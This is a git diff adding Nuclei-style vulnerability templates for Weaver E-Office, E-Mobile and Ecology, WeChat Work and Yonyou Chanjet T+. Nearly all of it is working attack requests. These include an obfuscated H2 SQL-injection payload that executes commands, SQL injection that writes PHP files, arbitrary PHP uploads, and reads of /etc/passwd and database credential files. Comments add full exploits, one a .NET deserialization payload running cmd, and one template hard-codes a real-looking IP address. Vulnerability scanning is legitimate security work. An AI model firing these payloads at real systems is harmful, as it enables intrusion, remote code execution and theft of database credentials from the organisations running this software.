a/http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml b/http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml new file mode 100644 index 0000000000..4219592256 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-mobile-client-do-rce.yaml @@ -0,0 +1,43 @@ +id: weaver-e-mobile-client-do-rce + +info: + name: weaver-e-mobile-client-do-rce + author: SleepingBag945 + severity: critical + description: 泛微E-Mobile 6.0远程命令执行漏洞 + reference: + - https://mp.weixin.qq.com/s/z-WN2_MTxdk3z4LvchXkXw + tags: eBridge,weaver,oa,read + +http: + - raw: + - | + POST /client.do HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 + Accept: */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Upgrade-Insecure-Requests: 1 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}} + + ------WebKitFormBoundary{{randstr}} + Content-Disposition: form-data; name="method" + + getupload + ------WebKitFormBoundary{{randstr}} + Content-Disposition: form-data; name="uploadID" + + 1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('ipconfig');-- + ------WebKitFormBoundary{{randstr}}-- + + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,'Windows IP') + condition: and + + diff --git a/http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml new file mode 100755 index 0000000000..01210aab71 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-group-xml-sqli.yaml @@ -0,0 +1,34 @@ +id: weaver-oa-e-office-group-xml-sqli + +info: + name: weaver-oa e-office group_xml sqli + author: SleepingBag945 + severity: critical + description: 泛微OA E-Office group_xml.php SQL注入漏洞,可写shell + reference: + - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20group_xml.php%20SQL注入漏洞.html + tags: weaver,e-office,oa,sqli + +http: + - raw: + - | + GET /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + GET /vulntest.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "phpinfo" + - type: status + status: + - 200 + +# 可构造exp写入shell +# [group]:[1]|[groupid]:[1 union select '',2,3,4,5,6,7,8 into outfile '../webroot/vulntest.php'] +# /inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd diff --git a/http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml b/http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml new file mode 100644 index 0000000000..87f2a19785 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-login-quick-seesionkey.yaml @@ -0,0 +1,44 @@ +id: weaver-e-office-login-quick-seesionkey + +info: + name: weaver-e-office-login-quick-seesionkey + author: zimuzhi + severity: high + description: 泛微OA E-Office login_quick.php 获取登录seesionnkey + tags: weaver,e-office,oa + +http: + - raw: + - | + POST /E-mobile/App/System/Login/login_quick.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + identifier=admin + + - | + GET /E-mobile/App/Init.php?m=all_Create&detailid=&fromid=&sessionkey={{timestamp}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + extractors: + - type: regex + name: timestamp + internal: true + group: 1 + regex: + - '\"sessionkey\":\"(.*?)\"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'{{timestamp}}')" + - "status_code_2 == 200 && contains(body_2,'新建')" + condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..8a4abef63a --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-mobile-upload-save-arbitrary-file-upload.yaml @@ -0,0 +1,51 @@ +id: weaver-e-office-mobile-upload-save-arbitrary-file-upload + +info: + name: weaver-e-office-mobile-upload-save-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 泛微e-office存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。 + reference: + - https://forum.butian.net/share/1791 + tags: weaver,e-office,oa + +http: + - raw: + - | + POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynejqegqr + Accept-Encoding: gzip + + ------WebKitFormBoundarynejqegqr + Content-Disposition: form-data; name="upload_quwan"; filename="{{randstr_1}}.php." + Content-Type: application/octet-stream + + <?php echo "{{randstr_2}}"; unlink(__FILE__); ?> + ------WebKitFormBoundarynejqegqr-- + + - | + GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1 + Host: 61.184.73.157:8082 + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + extractors: + - type: regex + name: attachmentID + internal: true + regex: + - "[0-9]{10}" + + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'[1')" + - "contains(body_2, '{{randstr_2}}') && status_code_2 == 200" + condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml b/http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml new file mode 100644 index 0000000000..2c1ea33d1a --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-mysql-config-info-leak.yaml @@ -0,0 +1,30 @@ +id: weaver-oa-e-office-mysql-config-info-leak + +info: + name: weaver-oa e-office mysql_config.ini info-leak + author: SleepingBag945 + severity: medium + description: 泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息 + reference: + - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20mysql_config.ini%20数据库信息泄漏漏洞.html + tags: weaver,e-office,oa,info + +http: + - raw: + - | + GET /mysql_config.ini HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - raw: + - | + GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains(body_1, "dataurl") && contains(body_1,"datapassword") && contains(body_1, "datauser")' + - 'status_code_2 == 200 && contains(body_2,"sip") && contains(body_2,"sdbuser") && contains(body_2,"sdbpassword")' + condition: or \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml new file mode 100755 index 0000000000..b4ac6e6d68 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-officeserver-arbitrary-file-read.yaml @@ -0,0 +1,31 @@ +id: weaver-oa-e-office-officeserver-arbitrary-file-read + +info: + name: weaver-oa e-office officeserver arbitrary file read + author: SleepingBag945 + severity: high + description: 泛微OA E-Office officeserver.php 任意文件读取漏洞 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java + tags: weaver,e-office,oa + +http: + - raw: + - | + GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "datapassword" + - type: word + words: + - "DBSTEP" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..7bdf5c9c6d --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload.yaml @@ -0,0 +1,66 @@ +id: weaver-e-office-uploadify-arbitrary-file-upload + +info: + name: weaver-e-office-uploadify-arbitrary-file-upload + author: SleepingBag945 + severity: critical + description: 泛微OA E-Office uploadify.php 任意文件上传漏洞 + reference: + - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py + tags: weaver,e-office,oa + +http: + - raw: + - | + GET /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + - | + POST /general/weibo/javascript/LazyUploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye + Accept-Encoding: gzip + + ------WebKitFormBoundaryjetvpuye + Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php" + Content-Type: application/octet-stream + + <?php echo "{{randstr_2}}";unlink(__FILE__);?> + ------WebKitFormBoundaryjetvpuye-- + + - | + GET /attachment/{{attachmentID}}/{{attachmentName}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + extractors: + - type: regex + name: attachmentID + internal: true + group: 1 + regex: + - "attachmentID\":(.*?)," + - type: regex + name: attachmentName + internal: true + group: 1 + regex: + - "attachmentName\":\"(.*?)\"," + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_2, 'attachmentID') && status_code_2 == 200" + - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml b/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml new file mode 100755 index 0000000000..5cd4ecbf7e --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload2.yaml @@ -0,0 +1,53 @@ +id: weaver-e-office-uploadify-arbitrary-file-upload2 + +info: + name: weaver-e-office-uploadify-arbitrary-file-upload2 + author: SleepingBag945 + severity: critical + description: 泛微OA E-Office uploadify.php 任意文件上传漏洞 + reference: + - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py + tags: weaver,e-office,oa + +http: + - raw: + - | + GET /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + - | + POST /general/weibo/javascript/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye + Accept-Encoding: gzip + + ------WebKitFormBoundaryjetvpuye + Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php" + Content-Type: application/octet-stream + + <?php echo "{{randstr_2}}";unlink(__FILE__);?> + ------WebKitFormBoundaryjetvpuye-- + + - | + GET /attachment/personal/_temp.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "contains(body_2, 'imageSrc') && status_code_2 == 200" + - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml b/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml new file mode 100755 index 0000000000..2adf272444 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-uploadify-arbitrary-file-upload3.yaml @@ -0,0 +1,59 @@ +id: weaver-e-office-uploadify-arbitrary-file-upload3 + +info: + name: weaver-e-office-uploadify-arbitrary-file-upload3 + author: SleepingBag945 + severity: critical + description: 泛微OA E-Office uploadify.php 任意文件上传漏洞 + reference: + - https://github.com/w-digital-scanner/w9scan/blob/master/plugins/weaver_oa/2158.py + tags: weaver,e-office,oa + +http: + - raw: + - | + GET /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + - | + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjetvpuye + Accept-Encoding: gzip + + ------WebKitFormBoundaryjetvpuye + Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.php" + Content-Type: application/octet-stream + + <?php echo "{{randstr_2}}";unlink(__FILE__);?> + ------WebKitFormBoundaryjetvpuye-- + + - | + GET /attachment/{{attachmentID}}/{{randstr_1}}.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + extractors: + - type: regex + name: attachmentID + internal: true + regex: + - "[0-9]{10}" + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + - "status_code_2 == 200" + - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + condition: and diff --git a/http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml b/http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml new file mode 100755 index 0000000000..d037cb7226 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-userselect-unauth.yaml @@ -0,0 +1,31 @@ +id: weaver-oa-e-office-userselect-unauth + +info: + name: weaver-oa e-office userselect unauth + author: SleepingBag945 + severity: high + description: 泛微OA E-Office UserSelect 未授权访问漏洞,泛微OA E-Office UserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java + - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20UserSelect%20未授权访问漏洞.html + tags: weaver,e-office,oa,sqli + +http: + - raw: + - | + GET /UserSelect/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + matchers-condition: and + matchers: + - type: word + words: + - "<title>选择人员" + - type: word + words: + - "/UserSelect/dept.php" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..c918f0b76d --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-v10-office-server-arbitrary-file-upload.yaml @@ -0,0 +1,80 @@ +id: weaver-oa-e-office-v10-office-server-arbitrary-file-upload + +info: + name: weaver-oa e-office-v10 OfficeServer.php arbitrary file upload + author: SleepingBag945 + severity: critical + description: 泛微OA E-Office OfficeServer.php 任意文件上传漏洞 + reference: + - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/WeaverEOfficeController.java + - https://github.com/Phuong39/2022-HW-POC/blob/main/泛微%20EOffice10%20前台%20GETSHELL.md + - http://wiki.peiqi.tech/wiki/oa/泛微OA/泛微OA%20E-Office%20OfficeServer.php%20任意文件上传漏洞.html + tags: weaver,e-office,oa,sqli + +http: + - raw: + - | + POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Cache-Control: max-age=0 + Connection: close + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew + Upgrade-Insecure-Requests: 1 + + ------WebKitFormBoundaryLpoiBFy4ANA8daew + Content-Disposition: form-data;name="FileData";filename="teest.php" + Content-Type: application/octet-stream + + + + ------WebKitFormBoundaryLpoiBFy4ANA8daew + Content-Disposition: form-data;name="FormData" + + {'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teest.php'} + ------WebKitFormBoundaryLpoiBFy4ANA8daew-- + + - raw: + - | + GET /eoffice10/server/public/iWebOffice2015/Document/teest.php + Host: {{Hostname}} + + + matchers-condition: and + matchers: + - type: word + words: + - "phpinfo" + - type: status + status: + - 200 + + +# shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php +# POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 +# Host: XXXXXXXX:8010 +# Content-Length: 378 +# Cache-Control: max-age=0 +# Upgrade-Insecure-Requests: 1 +# Origin: null +# Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs +# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like +# Gecko) Chrome/91.0.4472.77 Safari/537.36 +# Accept: +# text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ +# *;q=0.8,application/signed-exchange;v=b3;q=0.9 +# Accept-Encoding: gzip, deflate +# Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +# Connection: close +# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs +# Content-Disposition: form-data; name="FileData"; filename="1.jpg" +# Content-Type: image/jpeg +# +# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs +# Content-Disposition: form-data; name="FormData" +# {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} +# ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs-- \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml new file mode 100755 index 0000000000..9e9c0caefd --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-office-xmlrpcservlet-arbitrary-file-read.yaml @@ -0,0 +1,33 @@ +id: weaver-e-office-xmlrpcservlet-arbitrary-file-read + +info: + name: weaver-e-office-xmlrpcservlet-arbitrary-file-read + author: SleepingBag945 + severity: high + description: 通过漏洞攻击者可以获取敏感信息 + tags: weaver,e-office,oa,sqli + +http: + - raw: + - | + POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/xml + Accept-Encoding: gzip + + + WorkflowService.getAttachment + /etc/passwd + + + + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml new file mode 100755 index 0000000000..dd35bdd138 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-weaver-signaturedownload-arbitrary-file-read.yaml @@ -0,0 +1,36 @@ +id: weaver-e-weaver-signaturedownload-arbitrary-file-read + +info: + name: weaver-e-weaver-signaturedownload-arbitrary-file-read + author: SleepingBag945 + severity: high + description: 泛微OA E-Weaver SignatureDownLoad接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Weaver%20SignatureDownLoad%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DriverClasses" + - type: word + part: body + words: + - "ecology.password" + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml b/http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml new file mode 100644 index 0000000000..267ffa6e06 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-ecology-oa-plugin-checkserver-setting-sqli.yaml @@ -0,0 +1,29 @@ +id: weaver-ecology-oa-plugin-checkserver-setting-sqli + +info: + name: 泛微 Ecology OA CheckServer SQL 注入漏洞 + author: SleepingBag945 + severity: high + description: 泛微 Ecology OA 系统由于对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,远程且未经过身份认证的攻击者可利用此漏洞进行 SQL 注入攻击,从而可窃取数据库敏感信息。 + tags: weaver,ecology + +http: + - raw: + - | + GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + matchers: + - type: dsl + dsl: + - status_code == 200 + - '!contains(header,"securityIntercept")' + - 'contains(header,"application/json")' + - contains(body,"\"error\":\"system error\"") + condition: and + + +# http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html diff --git a/http/vulnerabilities/wechat/wechat-info-leak.yaml b/http/vulnerabilities/wechat/wechat-info-leak.yaml new file mode 100644 index 0000000000..eb239576c6 --- /dev/null +++ b/http/vulnerabilities/wechat/wechat-info-leak.yaml @@ -0,0 +1,25 @@ +id: wechat-info-leak + +info: + name: wechat-info-leak + author: SleepingBag945 + severity: high + description: | + 企业微信信息泄露 + metadata: + tags: wechat + +http: + - raw: + - | + GET /cgi-bin/gateway/agentinfo HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid") + - contains(body_1,"corpid") + condition: and diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml new file mode 100755 index 0000000000..c5dcb41470 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml @@ -0,0 +1,26 @@ +id: chanjet-tplus-checkmutex-sqli + +info: + name: chanjettplus - CheckMutex SQL Injection + author: unknown + severity: critical + description: | + There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou. + reference: + - https://stack.chaitin.com/vuldb/detail?id=f4ae9a80-58c7-4a5c-a463-ae4e40605880 + tags: chanjettplus,sqli + +http: + - raw: + - | + POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/plain + Cookie: ASP.NET_SessionId=; sid=admin + + {"accNum": "6'", "functionTag": "SYS0104", "url": ""} + matchers: + - type: word + words: + - "附近有语法错误" + part: body \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml new file mode 100644 index 0000000000..84fa88c270 --- /dev/null +++ b/http/vulnerabilities/yonyou/chanjet-tplus-getstorewarehousebystore_rce.yaml @@ -0,0 +1,67 @@ +id: chanjet-tplus-getstorewarehousebystore_rce + +info: + name: 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 + author: SleepingBag945 + severity: critical + description: | + 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞 + https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + metadata: + tags: yonyou,chanjet + +http: + - raw: + - | + POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 + Host: {{Hostname}} + X-Ajaxpro-Method: GetStoreWarehouseByStore + + { + "storeID":{} + } + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "actorId或archivesId不能为空" + - "\"Type\":\"System.ArgumentException\"" + condition: and + + - type: word + part: body + words: + - "Object reference not set to an instance of an object" + - "System.NullReferenceException" + condition: and + + + + + + +# EXP +# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1 +# Host: +# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F +# Connection: close +# Content-Length: 668 +# X-Ajaxpro-Method: GetStoreWarehouseByStore +# Accept-Encoding: gzip + +# { +# "storeID":{ +# "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", +# "MethodName":"Start", +# "ObjectInstance":{ +# "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", +# "StartInfo":{ +# "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", +# "FileName":"cmd", +# "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt" +# } 